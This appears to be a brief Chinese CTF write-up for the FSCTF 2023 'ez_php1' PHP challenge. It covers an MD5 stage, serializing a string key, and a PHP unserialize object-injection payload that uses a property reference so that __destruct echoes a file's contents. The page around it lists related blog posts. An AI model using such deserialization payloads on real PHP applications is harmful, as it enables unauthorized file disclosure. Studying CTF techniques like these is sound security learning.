[FSCTF 2023]ez_php1

  • 开发
  • 33

一共有三小关 

第一关:md5加密

 

第二关:反序列化

 重点  单个字符串序列化 unserialize($str) === "$KEY"

<?php
$KEY="YES I love";

echo serialize($KEY);

s:10:"YES I love";

第三关: 反序列化

把a的地址赋给b,因为在__destruct()中有echo,可以输出文件内容。 

$c=new Clazz();
$c->b=&$c->a;
echo serialize($c);

阅读全部

相关推荐

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-05-13 19:54:07       98 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-05-13 19:54:07       106 阅读

  9. 在Django里面运行非项目文件

    2024-05-13 19:54:07       87 阅读

  19. Python语言-面向对象

    2024-05-13 19:54:07       96 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-05-13 19:54:07       91 阅读

热门阅读

  2. 视觉SLAM14精讲——三维空间刚体运动1.1

    2024-05-13 19:54:07       38 阅读

  14. C++拓展之万能头

    2024-05-13 19:54:07       92 阅读

  18. [链表专题]力扣LCR077, 83

    2024-05-13 19:54:07       37 阅读

  22. Oracle导入数据中文乱码问题处理,修改客户端字符编码跟数据库的一致

    2024-05-13 19:54:07       39 阅读

  23. Spring boot 使用iText导出PDF 几种方式

    2024-05-13 19:54:07       31 阅读

  29. 秋招后端开发面试题 - JVM垃圾回收算法

    2024-05-13 19:54:07       35 阅读

  30. ☀️提高生产力:这10个Lambda表达式必须掌握!!!

    2024-05-13 19:54:07       37 阅读